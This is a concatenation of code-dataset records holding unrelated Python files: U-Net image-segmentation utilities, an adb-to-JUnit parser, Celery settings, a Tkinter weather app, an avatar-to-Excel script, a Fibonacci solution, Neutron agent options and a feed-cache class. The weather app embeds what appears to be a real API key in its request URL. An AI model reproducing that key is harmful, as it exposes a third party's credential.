img[...,segmentation_channels[ch_i]]\r\n        img = new_img\r\n        img = img / np.max(img)\r\n        img = (img - np.mean(img)) / np.std(img)\r\n        img_patch_shape = patch_shape + (img.shape[-1],)\r\n        \r\n        # Load masks and normalize\r\n        mask = io.imread(mask_paths[ind]).astype(np.float32)\r\n        if (len(mask.shape) == 3) and (mask.shape[0] < mask.shape[-1]):\r\n            print (\" >> Mask looks like channels-first representation (Shape: {})... converting to channels-last representation (Shape: {}).\".format(mask.shape, np.moveaxis(mask, 0, -1).shape))\r\n            mask = np.moveaxis(mask, 0, -1)\r\n        \r\n        # If mask is a single channel with grayscale values as labels, convert to channel format\r\n        if (len(mask.shape) == 2 or (mask.shape[-1] == 1 and np.max(mask) > 1)) and workflow_type=='segmentation':\r\n            mask = to_categorical(mask)\r\n            if categorical_notice:\r\n                print (\" >> Number of classes in this mask: {}\".format(mask.shape[-1]))\r\n                print (\" >> Mask looks like grayscale values... 
converting to categorical representation.\")\r\n categorical_notice = False\r\n else:\r\n mask = mask / np.max(mask)\r\n if len(mask.shape) < 3:\r\n mask = np.expand_dims(mask, axis=-1)\r\n mask_patch_shape = patch_shape + (mask.shape[-1],)\r\n \r\n # Append the images to a dictionary\r\n loaded_imgs[img_paths[ind]] = img\r\n loaded_masks[mask_paths[ind]] = mask\r\n \r\n # Create windows from both the training images and the masks\r\n img_patches = view_as_windows(img, img_patch_shape, step=patch_shape[0]//4)\r\n mask_patches = view_as_windows(mask, mask_patch_shape, step=patch_shape[0]//4)\r\n img_patches = np.squeeze(img_patches)\r\n mask_patches = np.squeeze(mask_patches)\r\n \r\n # Calculate input and output channels\r\n if input_channels is None:\r\n if n_ch >= 1:\r\n input_channels = n_ch\r\n else:\r\n input_channels = 1\r\n if output_channels is None:\r\n output_channels = mask_patch_shape[-1]\r\n \r\n # Set the threshold number of pixels required to add the training image to the set\r\n # If at least 5% of the mask patch has true values \r\n mask_thresh = patch_thresh * patch_shape[0] * patch_shape[1] if patch_thresh < 1 else patch_thresh\r\n \r\n # Iterate over the grid of window views\r\n for patch_ind_0 in range(img_patches.shape[0]):\r\n for patch_ind_1 in range(img_patches.shape[1]):\r\n img_patch = np.array(img_patches[patch_ind_0,patch_ind_1])\r\n mask_patch = np.array(mask_patches[patch_ind_0,patch_ind_1])\r\n \r\n #print([(mask_patch[...,i] > 0).sum() > mask_thresh for i in range(mask_patch.shape[-1]) ] ) \r\n #print (mask_thresh)\r\n \r\n # Only include training images where the mask patch is above the threshold\r\n if all( [(mask_patch[...,i] > 0).sum() > mask_thresh for i in range(mask_patch.shape[-1])] ) or workflow_type=='image2image':\r\n \r\n tmp_img_list = [img_paths[ind], patch_ind_0, patch_ind_1, '']\r\n tmp_masks_list = [mask_paths[ind], patch_ind_0, patch_ind_1, '']\r\n \r\n if training_flag:\r\n # Append Images w/patch coords and augmentations (only if training) cues to list\r\n train_images.append(tmp_img_list)\r\n train_masks.append(tmp_masks_list)\r\n \r\n for augment in augmentations:\r\n tmp_img_list = [img_paths[ind], patch_ind_0, patch_ind_1, augment]\r\n tmp_masks_list = [mask_paths[ind], patch_ind_0, patch_ind_1, augment]\r\n train_images.append(tmp_img_list)\r\n train_masks.append(tmp_masks_list)\r\n \r\n else:\r\n # If validation set, append those images to the correct lists\r\n val_images.append(tmp_img_list)\r\n val_masks.append(tmp_masks_list)\r\n \r\n return train_images, train_masks, val_images, val_masks, input_channels, output_channels, loaded_imgs, loaded_masks\r\n\r\n\r\n##########\r\n# Models #\r\n##########\r\n\r\ndef unet(patch_height, patch_width, in_ch, out_ch, final_act='sigmoid', loss_fn=None):\r\n inputs = Input((patch_height, patch_width, in_ch))\r\n conv1 = Convolution2D(32, (3, 3), activation='relu', padding='same')(inputs)\r\n conv1 = BatchNormalization()(conv1)\r\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\r\n\r\n conv2 = Convolution2D(64, (3, 3), activation='relu', padding='same')(pool1)\r\n conv2 = BatchNormalization()(conv2)\r\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\r\n\r\n conv3 = Convolution2D(128, (3, 3), activation='relu', padding='same')(pool2)\r\n conv3 = BatchNormalization()(conv3)\r\n\r\n up1 = Concatenate(axis=-1)([UpSampling2D(size=(2, 2))(conv3), conv2])\r\n conv4 = Convolution2D(64, (3, 3), activation='relu', padding='same')(up1)\r\n conv4 = BatchNormalization()(conv4)\r\n\r\n up2 = 
Concatenate(axis=-1)([UpSampling2D(size=(2, 2))(conv4), conv1])\r\n conv5 = Convolution2D(32, (3, 3), activation='relu', padding='same')(up2)\r\n conv5 = BatchNormalization()(conv5)\r\n\r\n conv7 = Convolution2D(16, (1, 1), activation='relu')(conv5)\r\n conv7 = BatchNormalization()(conv7)\r\n conv7 = Dropout(rate=0.33)(conv7)\r\n last_conv = Convolution2D(out_ch, (1, 1), activation=final_act)(conv7)\r\n \r\n model = Model(inputs=inputs, outputs=last_conv)\r\n if loss_fn:\r\n model.compile(optimizer=Adam(lr=1e-4), loss=loss_fn, metrics=['accuracy'])\r\n return model\r\n \r\ndef big_unet(patch_height, patch_width, in_ch, out_ch, final_act='sigmoid', loss_fn=None):\r\n inputs = Input((patch_height, patch_width, in_ch))\r\n conv1 = Convolution2D(64, (3, 3), activation='relu', padding='same')(inputs)\r\n conv1 = BatchNormalization()(conv1)\r\n conv1 = Convolution2D(64, (3, 3), activation='relu', padding='same')(conv1)\r\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\r\n\r\n conv2 = Convolution2D(128, (3, 3), activation='relu', padding='same')(pool1)\r\n conv2 = BatchNormalization()(conv2)\r\n conv2 = Convolution2D(128, (3, 3), activation='relu', padding='same')(conv2)\r\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\r\n\r\n conv3 = Convolution2D(256, (3, 3), activation='relu', padding='same')(pool2)\r\n conv3 = BatchNormalization()(conv3)\r\n conv3 = Convolution2D(256, (3, 3), activation='relu', padding='same')(conv3)\r\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\r\n \r\n conv3a = Convolution2D(512, (3, 3), activation='relu', padding='same')(pool3)\r\n conv3a = BatchNormalization()(conv3a)\r\n conv3a = Convolution2D(512, (3, 3), activation='relu', padding='same')(conv3a)\r\n pool3a = MaxPooling2D(pool_size=(2, 2))(conv3a)\r\n \r\n conv4 = Convolution2D(512, (3, 3), activation='relu', padding='same')(pool3a)\r\n conv4 = BatchNormalization()(conv4)\r\n conv4 = Convolution2D(512, (3, 3), activation='relu', padding='same')(conv4)\r\n \r\n up1a = Concatenate(axis=-1)([UpSampling2D(size=(2, 2))(conv4), conv3a])\r\n conv5a = Convolution2D(512, (3, 3), activation='relu', padding='same')(up1a)\r\n conv5a = BatchNormalization()(conv5a)\r\n conv5a = Convolution2D(512, (3, 3), activation='relu', padding='same')(conv5a)\r\n \r\n up1 = Concatenate(axis=-1)([UpSampling2D(size=(2, 2))(conv5a), conv3])\r\n conv5 = Convolution2D(256, (3, 3), activation='relu', padding='same')(up1)\r\n conv5 = BatchNormalization()(conv5)\r\n conv5 = Convolution2D(256, (3, 3), activation='relu', padding='same')(conv5)\r\n \r\n up1 = Concatenate(axis=-1)([UpSampling2D(size=(2, 2))(conv5), conv2])\r\n conv6 = Convolution2D(128, (3, 3), activation='relu', padding='same')(up1)\r\n conv6 = BatchNormalization()(conv6)\r\n conv6 = Convolution2D(128, (3, 3), activation='relu', padding='same')(conv6)\r\n\r\n up2 = Concatenate(axis=-1)([UpSampling2D(size=(2, 2))(conv6), conv1])\r\n conv7 = Convolution2D(64, (3, 3), activation='relu', padding='same')(up2)\r\n conv7 = BatchNormalization()(conv7)\r\n conv7 = Convolution2D(64, (3, 3), activation='relu', padding='same')(conv7)\r\n \r\n conv8 = Convolution2D(32, (1, 1), activation='relu')(conv7)\r\n conv8 = BatchNormalization()(conv8)\r\n conv8 = Dropout(rate=0.33)(conv8)\r\n last_conv = Convolution2D(out_ch, (1, 1), activation=final_act)(conv8)\r\n\r\n model = Model(inputs=inputs, outputs=last_conv)\r\n if loss_fn:\r\n model.compile(optimizer=Adam(lr=1e-4), loss=loss_fn, metrics=['accuracy'])\r\n return model\r\n\r\n##########\r\n# Losses #\r\n##########\r\n\r\nsmooth = 1e-5\r\ndef 
dice_coef(y_true, y_pred):\r\n y_true_f = K.flatten(y_true)\r\n y_pred_f = K.flatten(y_pred)\r\n intersection = K.sum(y_true_f * y_pred_f)\r\n return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\r\n \r\ndef dice_loss(y_true, y_pred):\r\n return -dice_coef(y_true, y_pred)\r\n\r\ndef tversky_loss(y_true, y_pred):\r\n alpha = 0.5\r\n beta = 0.5\r\n ones = K.ones(K.shape(y_true))\r\n p0 = y_pred # proba that voxels are class i\r\n p1 = ones-y_pred # proba that voxels are not class i\r\n g0 = y_true\r\n g1 = ones-y_true\r\n \r\n num = K.sum(p0*g0, (0,1,2))\r\n den = num + alpha*K.sum(p0*g1,(0,1,2)) + beta*K.sum(p1*g0,(0,1,2))\r\n T = K.sum(num/den) # when summing over classes, T has dynamic range [0 Ncl]\r\n \r\n Ncl = K.cast(K.shape(y_true)[-1], 'float32')\r\n return Ncl-T\r\n\r\ndef multi_dice_coef_loss(num_classes, channel_weights=None):\r\n def _multi_dice_coef_loss(y_true, y_pred):\r\n loss = 0.\r\n total = K.sum(K.flatten(y_true)) + smooth\r\n denominator = 0.\r\n for i in range(num_classes):\r\n denominator += total / (K.sum(K.flatten(y_true[...,i])) + smooth)\r\n \r\n for i in range(num_classes):\r\n ratio_i = total / K.sum(K.flatten(y_true[...,i]))\r\n ratio_i = ratio_i / denominator\r\n if channel_weights:\r\n ratio_i = ratio_i * channel_weights[i]\r\n loss += ratio_i * dice_loss(y_true, y_pred)\r\n return loss\r\n return _multi_dice_coef_loss\r\n","repo_name":"wtreible/VIMSSegNet","sub_path":"scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":23557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17557540536","text":"#!/usr/bin/env python\n'''A Python module containing functionality for parsing and creating junit reports form adb test runners output.\n'''\nimport xml.etree.ElementTree as ET\nimport xml.dom.minidom\nimport os\nimport logging\n\n__author__ = 'Andreas Nilsson'\n__email__ = 'andreas.nilsson@jayway.com'\n__copyright__ = \"Copyright 2013, Jayway\"\n__license__ = 'Apache 2.0'\n\n#Constants\n_COLON_CHAR = ':'\n_EQUALS_CHAR = '='\n_DOT_CHAR = '.'\n\n#Logger\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n#Formatter\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n#Setup Console logging\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nch.setFormatter(formatter)\n\n#Add logger handlers\nlogger.addHandler(ch)\n\n\n_process_error_words = ['INSTRUMENTATION_RESULT', 'INSTRUMENTATION_CODE']\n\nclass TestObject(object):\n '''The parsed representation from the adb output of running an instrument.'''\n class_name = ''\n\n # Dict format: {method : (type, details)}\n erroneous_methods = dict()\n _last_failed_method = None\n\n def __init__(self, class_name=''):\n self.class_name = class_name\n self.erroneous_methods = dict()\n self._last_failed_method = 'Unknown Method'\n\n def __str__(self):\n str = 'class:\\n%s\\n' % self.class_name\n str += 'failed methods:\\n'\n for key in self.erroneous_methods:\n str += key + '\\n'\n type, details = self.erroneous_methods[key]\n str += 'type: %s\\n' % type\n str += 'details: %s\\n' % details\n\n return str\n\n\n def add_failed_method(self, method_name):\n self._last_failed_method = method_name\n self.erroneous_methods[method_name] = (None, None)\n\n\n def has_failures(self):\n return True if self.erroneous_methods else False\n\n\n def add_error(self, error_type, error_details):\n '''\n Adds an error for the last registered method.\n Limitation: There could 
be only one error per method\n '''\n if self._last_failed_method:\n self.erroneous_methods[self._last_failed_method] = (error_type, error_details)\n\n\n def get_error(self, method_name):\n '''\n Returns the error for a specific method name.\n '''\n if self.erroneous_methods[method_name]:\n return self.erroneous_methods[method_name]\n else:\n return None\n\n\ndef _is_line_process_crash(line):\n return any(word in line for word in _process_error_words)\n\n\ndef _parse_test_object_from_line(line):\n test_obj = None\n split = line.split(_COLON_CHAR)\n\n if len(split) > 1:\n class_line = split[0]\n # checks that there is at least two dots thus giving us confidence\n # That it is probably a class name on that line.\n if class_line.count(_DOT_CHAR) > 2:\n test_obj = TestObject(class_line)\n\n\n if not test_obj:\n logger.error('Could not parse object from line: %s', line)\n return test_obj\n\n\ndef _parse_process_crash_error(line, next_line):\n error_type = None\n error_details = None\n split = line.split(_COLON_CHAR)\n if len(split) > 1 and 'shortMsg' in line:\n if len(line.split(_EQUALS_CHAR)) > 1:\n error_type = line.split(_EQUALS_CHAR)[1]\n\n #next line has full msg\n if next_line and 'longMsg' in next_line:\n error_details = next_line.split(_EQUALS_CHAR)[1]\n\n return error_type, error_details\n\n\ndef parse_adb_output(output):\n try:\n logger.debug(\"ADB Output: %s\", output)\n lines = output.splitlines()\n all_objects = []\n test_obj = None\n\n for i, line in enumerate(lines):\n line = line.strip('\\t').strip()\n\n if not line:\n continue\n\n is_failure = line.startswith('Failure')\n is_stacktrace = line.startswith('at')\n is_type_of_fail_line = line.startswith('junit')\n is_last_parse_line = 'Test results for' in line\n\n if is_last_parse_line:\n break\n elif is_failure:\n if 'in' in line:\n failed_method = line.split('in')[1].strip(\" :\")\n if failed_method and test_obj:\n test_obj.add_failed_method(failed_method)\n elif is_type_of_fail_line:\n split = line.split(_COLON_CHAR)\n if len(split) > 1:\n error_type = split[0]\n error_details = line\n\n if error_type:\n test_obj.add_error(error_type, error_details)\n elif is_stacktrace:\n pass\n else:\n new_test_obj = _parse_test_object_from_line(line)\n\n if new_test_obj:\n test_obj = new_test_obj\n all_objects.append(test_obj)\n else:\n logger.debug('Failed to parse object from line \"%s', line)\n\n if _is_line_process_crash(line):\n next_line = None\n\n try:\n next_line = lines[i + 1]\n except IndexError:\n pass\n\n error_type, error_details = _parse_process_crash_error(line, next_line)\n\n if error_type:\n test_obj.add_error(error_type, error_details)\n\n logger.info(\"Created %d test objects\" % len(all_objects))\n logger.info(\"Objects failed: %d\" % get_no_failed_objects(all_objects))\n return all_objects\n except Exception as e:\n logger.error(e.message)\n logger.error('Failed to parse adb output properly')\n return []\n\n\n\ndef parse_and_generate_xml(adb_output):\n return generate_junit_xml_report(parse_adb_output(adb_output))\n\n\ndef generate_junit_xml_report(test_objects, success_message='Successful'):\n test_suite = ET.Element('testsuite')\n\n for obj in test_objects:\n if obj.has_failures():\n for method_name in obj.erroneous_methods:\n type, details = obj.get_error(method_name)\n\n test_case = ET.SubElement(test_suite, 'testcase', {'classname': obj.class_name, 'name': method_name})\n\n failure = ET.SubElement(test_case, 'failure', {'type': type})\n failure.text = details\n\n else:\n ET.SubElement(test_suite, 'testcase', 
{'classname': obj.class_name, 'name': success_message})\n\n x = xml.dom.minidom.parseString(ET.tostring(test_suite))\n return x.toprettyxml()\n\n\ndef get_no_failed_objects(test_objects):\n return sum(obj.has_failures() for obj in test_objects)\n\n\ndef write_to_file(filename, report, use_relative_path=True):\n if filename:\n full_filename = os.getcwd() + os.sep + filename if use_relative_path else filename\n\n out_file = open(full_filename, 'w')\n\n #noinspection PyCompatibility\n try:\n out_file.write(report)\n except IOError:\n logger.error('failed to write file to disk: ' + str(IOError.message))\n finally:\n logger.info('Wrote report to file: %s', full_filename)\n out_file.close()\n else:\n logger.error('A proper filename not provided')\n\n","repo_name":"jayway/adbutils","sub_path":"adbparser.py","file_name":"adbparser.py","file_ext":"py","file_size_in_byte":7220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72762817514","text":"from datetime import timedelta\nfrom celery.schedules import crontab\n\nBROKER_URL = 'redis://localhost:6379/1'\nCELERY_RESULT_BACKEND = 'redis://localhost:6379/2'\nCELERY_IGNORE_RESULT = False\nCELERY_SEND_TASK_ERROR_EMAILS = False\nCELERY_DEFAULT_QUEUE = 'default'\nCELERY_DEFAULT_EXCHANGE = 'default'\nCELERY_DEFAULT_EXCHANGE_TYPE = 'topic'\nCELERY_DEFAULT_ROUTING_KEY = 'task.default'\n\nCELERY_IMPORTS = (\n \"med_social.tasks\",\n)\n\nCELERY_QUEUES = {\n 'default': {\n 'exchange': 'default',\n 'exchange_type': 'topic',\n 'binding_key': 'task.#',\n },\n\n 'aggregator': {\n 'exchange': 'aggregator',\n 'exchange_type': 'topic',\n 'binding_key': 'aggregator.#'\n },\n 'fast': {\n 'exchange': 'fast',\n 'exchange_type': 'topic',\n 'binding_key': 'celery_fast.#'\n },\n 'long': {\n 'exchange': 'long',\n 'exchange_type': 'topic',\n 'binding_key': 'celery_long.#'\n }\n}\n\nCELERY_ROUTES = {\n 'aggregator.tasks.*': {\n 'queue': 'aggregator',\n 'routing_key': 'aggregator.search'\n },\n 'vendors.tasks.populate_vendors_clearbit_data': {\n 'queue': 'long'\n }\n}\n\n\n#CELERYBEAT_SCHEDULE = {\n #'add-every-30-seconds': {\n # 'task': 'tasks.add',\n # 'schedule': timedelta(seconds=30),\n # 'args': (16, 16)\n #},\n#}\n\nCELERYBEAT_SCHEDULE = {\n 'populate-clearbit': {\n 'task': 'vendors.tasks.populate_vendors_clearbit_data',\n 'schedule': timedelta(days=1),\n 'args': ()\n }\n}\n\nCELERYD_PREFETCH_MULTIPLIER = 1\n\n\nimport djcelery\ndjcelery.setup_loader()\n","repo_name":"ExpoPythonist/ProveBanking__s","sub_path":"med_social/settings/celery_settings.py","file_name":"celery_settings.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13942161529","text":"import os \r\nimport json\r\nimport time\r\nimport calendar\r\nimport requests\r\nimport xlsxwriter\r\n\r\nimg_folder = 'img'\r\n\r\n#create img folder\r\nif not os.path.exists('img'):\r\n os.makedirs(img_folder)\r\n\r\n#read Json data\r\nwith open('MOCK_DATA.json', 'r') as f:\r\n json_data = json.load(f)\r\n\r\n#img download and store in img folder\r\nfor img in json_data:\r\n response = requests.get(img['avatar'])\r\n id = img['id']\r\n with open(f'{img_folder}/image{id}.jpg', 'wb') as f:\r\n f.write(response.content)\r\n\r\n# Group the data by company name\r\ngroups = {}\r\nfor item in json_data:\r\n company = item['company_name']\r\n if company not in groups:\r\n groups[company] = []\r\n groups[company].append(item)\r\n\r\n#xlsx File name using 
timestamp\r\nfile_name = time.gmtime()\r\nxlsx_name = str(calendar.timegm(file_name))+'.xlsx'\r\nworkbook = xlsxwriter.Workbook(xlsx_name)\r\nworksheet = workbook.add_worksheet()\r\nworksheet.set_column('B:M', 17)\r\n\r\n#Bold and Font Size of Row rang 0 to 1\r\nuser_data = workbook.add_format({'bold': True})\r\nuser_data.set_font_size(18)\r\nuser_data.set_align('center')\r\nuser_data.set_align('vcenter')\r\nuser_data.set_bg_color('#BBE3BC')\r\nuser_data.set_font_name('Arial')\r\n\r\n#Bold and font size of row rang 2 to 3\r\ncell_format = workbook.add_format({'bold': True})\r\ncell_format.set_font_size(12)\r\ncell_format.set_align('center')\r\ncell_format.set_align('vcenter')\r\ncell_format.set_bg_color('#FEF2CD')\r\ncell_format.set_font_name('Arial')\r\n\r\n#Haders style in excelsheet\r\nworksheet.merge_range(0, 0, 1, 12, 'Users Data', user_data)\r\nworksheet.merge_range(2, 0, 3, 0, 'SR.', cell_format)\r\nworksheet.merge_range(2, 1, 3, 1, 'Avatar', cell_format)\r\nworksheet.merge_range(2, 2, 3, 2, 'ID', cell_format)\r\nworksheet.merge_range(2, 3, 3, 3, 'First Name', cell_format)\r\nworksheet.merge_range(2, 4, 3, 4, 'Last Name', cell_format)\r\nworksheet.merge_range(2, 5, 3, 5, 'Email', cell_format)\r\nworksheet.merge_range(2, 6, 3, 6, 'Gender', cell_format)\r\nworksheet.merge_range(2, 7, 3, 7, 'Company Name', cell_format)\r\nworksheet.merge_range(2, 8, 3, 8, 'Job Title', cell_format)\r\nworksheet.merge_range(2, 9, 3, 9, 'Skills', cell_format)\r\nworksheet.merge_range(2, 10, 2, 12, 'Car', cell_format)\r\nworksheet.write(3, 10, 'Make', cell_format)\r\nworksheet.write(3, 11, 'Model', cell_format)\r\nworksheet.write(3, 12, 'Year', cell_format)\r\n\r\ni, j, row = 1, 4, 4\r\ncell_width = 50\r\ncell_height = 50\r\nfor company, items in groups.items():\r\n for data in items:\r\n worksheet.set_row(j, 45)\r\n worksheet.write(row, 0, i)\r\n id = data['id']\r\n worksheet.insert_image(row, 1, f'{img_folder}/image{id}.jpg', {'width': 50, 'height': 50})\r\n worksheet.write(row, 2, data['id'])\r\n worksheet.write(row, 3, data['first_name'])\r\n worksheet.write(row, 4, data['last_name'])\r\n worksheet.write(row, 5, data['email'])\r\n worksheet.write(row, 6, data['gender'])\r\n worksheet.write(row, 7, data['company_name'])\r\n worksheet.write(row, 8, data['job_title'])\r\n skills = ', '.join(data['skills'])\r\n worksheet.write(row, 9, skills)\r\n worksheet.write(row, 10, data['car']['make'])\r\n worksheet.write(row, 11, data['car']['model'])\r\n worksheet.write(row, 12, data['car']['year'])\r\n i +=1\r\n j +=1\r\n row +=1\r\n\r\nworkbook.close()\r\n","repo_name":"Bala-py-dev/task_propelius","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41792433796","text":"# -*- coding: utf-8 -*-\n# __file__ : 509. 
斐波那契数.py\n# __time__ : 2020/6/27 10:04 PM\n\nimport typing\n\n\n\"\"\"\nThe Fibonacci numbers, commonly denoted F(n), form a sequence called the Fibonacci sequence. The sequence starts from 0 and 1, and each subsequent number is the sum of the two preceding ones. That is:\n\nF(0) = 0,   F(1) = 1\nF(N) = F(N - 1) + F(N - 2), where N > 1.\nGiven N, compute F(N).\n\n \n\nExample 1:\n\nInput: 2\nOutput: 1\nExplanation: F(2) = F(1) + F(0) = 1 + 0 = 1.\nExample 2:\n\nInput: 3\nOutput: 2\nExplanation: F(3) = F(2) + F(1) = 1 + 1 = 2.\nExample 3:\n\nInput: 4\nOutput: 3\nExplanation: F(4) = F(3) + F(2) = 2 + 1 = 3.\n\nInput: 5\nOutput: 5\nExplanation: F(5) = F(4) + F(3) = 3 + 2 = 5\n \n\nConstraints:\n\n0 ≤ N ≤ 30\n\nSource: LeetCode (力扣)\nLink: https://leetcode-cn.com/problems/fibonacci-number\nThe copyright belongs to LeetCode China (领扣网络). Commercial reprints require official authorization; non-commercial reprints must credit the source.\n\"\"\"\n\n\nclass Solution:\n    # def fib(self, N: int) -> int:\n    #     if N <= 1:\n    #         return N\n    #     return self.memoize(N)\n    #\n    # def memoize(self, N: int) -> {}:\n    #     cache = {0: 0, 1: 1}\n    #\n    #     # Since range is exclusive and we want to include N, we need to put N+1.\n    #     for i in range(2, N + 1):\n    #         cache[i] = cache[i - 1] + cache[i - 2]\n    #\n    #     return cache[N]\n    def fib(self, N: int) -> int:\n        if N <= 1:\n            return N\n        if N == 2:\n            return 1\n\n        current = 0\n        pre1 = 1\n        pre2 = 1\n        for i in range(3, N + 1):\n            current = pre1 + pre2\n            pre2 = pre1\n            pre1 = current\n        return current\n\n    # memoization / DP table\n\n\nif __name__ == \"__main__\":\n\n    print(Solution().fib(300))\n","repo_name":"zuanzuanshao/ModuleStudy","sub_path":"algorithm_study/LeetCode/509. 斐波那契数.py","file_name":"509. 斐波那契数.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}{"seq_id":"8670340061","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_config import cfg\n\nfrom neutron._i18n import _\nfrom neutron.common import _constants\n\nAGENT_OPTS = [\n    # The agent_down_time value can only be a max of INT_MAX (as defined in C),\n    # where int is usually 32 bits. The agent_down_time will be passed to\n    # eventlet in milliseconds and any number higher will produce an OverFlow\n    # error. More details here: https://bugs.launchpad.net/neutron/+bug/2028724\n    cfg.IntOpt('agent_down_time', default=75,\n               max=((2**32 / 2 - 1) // 1000),\n               help=_(\"Seconds to regard the agent as down; should be at \"\n                      \"least twice report_interval, to be sure the \"\n                      \"agent is down for good.\")),\n    cfg.StrOpt('dhcp_load_type', default='networks',\n               choices=['networks', 'subnets', 'ports'],\n               help=_('Representing the resource type whose load is being '\n                      'reported by the agent. This can be \"networks\", '\n                      '\"subnets\" or \"ports\". '\n                      'When specified (Default is networks), the server will '\n                      'extract particular load sent as part of its agent '\n                      'configuration object from the agent report state, '\n                      'which is the number of resources being consumed, at '\n                      'every report_interval. '\n                      'dhcp_load_type can be used in combination with '\n                      'network_scheduler_driver = '\n                      'neutron.scheduler.dhcp_agent_scheduler.WeightScheduler '\n                      'When the network_scheduler_driver is WeightScheduler, '\n                      'dhcp_load_type can be configured to represent the '\n                      'choice for the resource being balanced. 
'\n 'Example: dhcp_load_type=networks')),\n cfg.BoolOpt('enable_new_agents', default=True,\n help=_(\"Agents start with admin_state_up=False when \"\n \"enable_new_agents=False. In this case, a user's \"\n \"resources will not be scheduled automatically to an \"\n \"agent until an admin sets admin_state_up to True.\")),\n cfg.IntOpt(\"rpc_resources_processing_step\",\n default=_constants.RPC_RES_PROCESSING_STEP, min=1,\n help=_(\"Number of resources for neutron to divide \"\n \"a large RPC call into data sets. It can be reduced \"\n \"if RPC timeouts occur. The best value should be \"\n \"determined empirically in your environment.\"))\n]\n\n\ndef register_db_agents_opts(conf=cfg.CONF):\n conf.register_opts(AGENT_OPTS)\n","repo_name":"openstack/neutron","sub_path":"neutron/conf/agent/database/agents_db.py","file_name":"agents_db.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"73351350953","text":"import tkinter as tk\r\nimport requests\r\nimport time\r\n\r\ndef getWeather(canvas):\r\n city = textfield.get()\r\n api = \"https://api.openweathermap.org/data/2.5/weather?q=\" + city + \"&appid=2854010aff2f442351d8c0ab2e40c279\"\r\n json_data = requests.get(api).json()\r\n temperature = int(json_data['main']['temp'] - 273.15)\r\n condition = json_data['weather'][0]['main']\r\n pressure = json_data['main']['pressure']\r\n humidity = json_data['main']['humidity']\r\n srise = time.strftime(\"%H:%M:%S\", time.gmtime(json_data['sys']['sunrise'] + 28800))\r\n sset = time.strftime(\"%H:%M:%S\", time.gmtime(json_data['sys']['sunset'] + 28800))\r\n\r\n final_info = condition + '\\n' + str(temperature) + \"°C\"\r\n final_data = 'Pressure: ' + str(pressure) + \"Hg\" + '\\n' + 'Humidity: ' + str(humidity) + \"%\" + '\\n' + 'Sunrise: ' + srise + '\\n' + 'Sunset: ' + sset\r\n label1.config(text=final_info)\r\n label2.config(text=final_data)\r\n\r\n#canvas for rectangular area\r\ncanvas = tk.Tk()\r\ncanvas.geometry(\"600x600\")\r\ncanvas.title(\"Weather App\")\r\n#font\r\nf = (\"vendetta\", 14, \"italic\")\r\nt = (\"helvetica\", 30, \"bold\")\r\n\r\n#textfields for data entry\r\ntextfield = tk.Entry(canvas, justify='center', font=t)\r\ntextfield.pack(pady=24)\r\ntextfield.focus()\r\ntextfield.bind('<Return>', getWeather)\r\n\r\n\r\nlabel1 = tk.Label(canvas, font=t)\r\nlabel1.pack()\r\nlabel2 = tk.Label(canvas, font=f)\r\nlabel2.pack()\r\ncanvas.mainloop()","repo_name":"itshariiiiiiiiiiii/Progressio","sub_path":"Category 2.py","file_name":"Category 2.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44305740964","text":"import errno\nimport gc\nimport logging\nimport os\nimport shutil\nimport textwrap\nimport threading\n# noinspection PyProtectedMember\nfrom timeit import default_timer as timer\n\nimport cbint.utils.feed\nimport simplejson as json\nfrom jinja2 import Template\n\n_logger = logging.getLogger(__name__)\n\n\nclass FeedCacheBase(object):\n \"\"\"Manages the feed data that is cached on disk.\n\n Going forward, instead of keeping a feed in memory, it is now stored on disk. 
This is to reduce memory\n footprint of long running process.\n \"\"\"\n _feed_cache_new_file = \"feed.cache_new\"\n _feed_cache_file = \"feed.cache\"\n # noinspection PyUnusedName\n _reports_cache_file = \"reports.cache\"\n\n def __init__(self, config, location, lock=None):\n self._config = config\n self._location = location\n self._internal_lock = not lock\n self._lock = lock or threading.RLock()\n self._exists = False\n\n # noinspection PyUnusedFunction\n @property\n def lock(self):\n \"\"\"This is the mutex used to access the cache file.\"\"\"\n return self._lock\n\n @property\n def location(self):\n return self._location\n\n @property\n def file_name(self):\n return self._feed_cache_file\n\n def _ensure_location_exists(self):\n \"\"\"This was taken from cbint.utils.filesystem to reduce the imports.\"\"\"\n if not os.path.exists(self._location):\n try:\n os.makedirs(self._location)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n\n def _swap_file_cache(self):\n with self._lock:\n # This is a quick operation that will not leave the file in an invalid state.\n shutil.move(os.path.join(self._location, self._feed_cache_new_file),\n os.path.join(self._location, self._feed_cache_file))\n\n def __del__(self):\n if self._internal_lock:\n del self._lock\n del self._config\n del 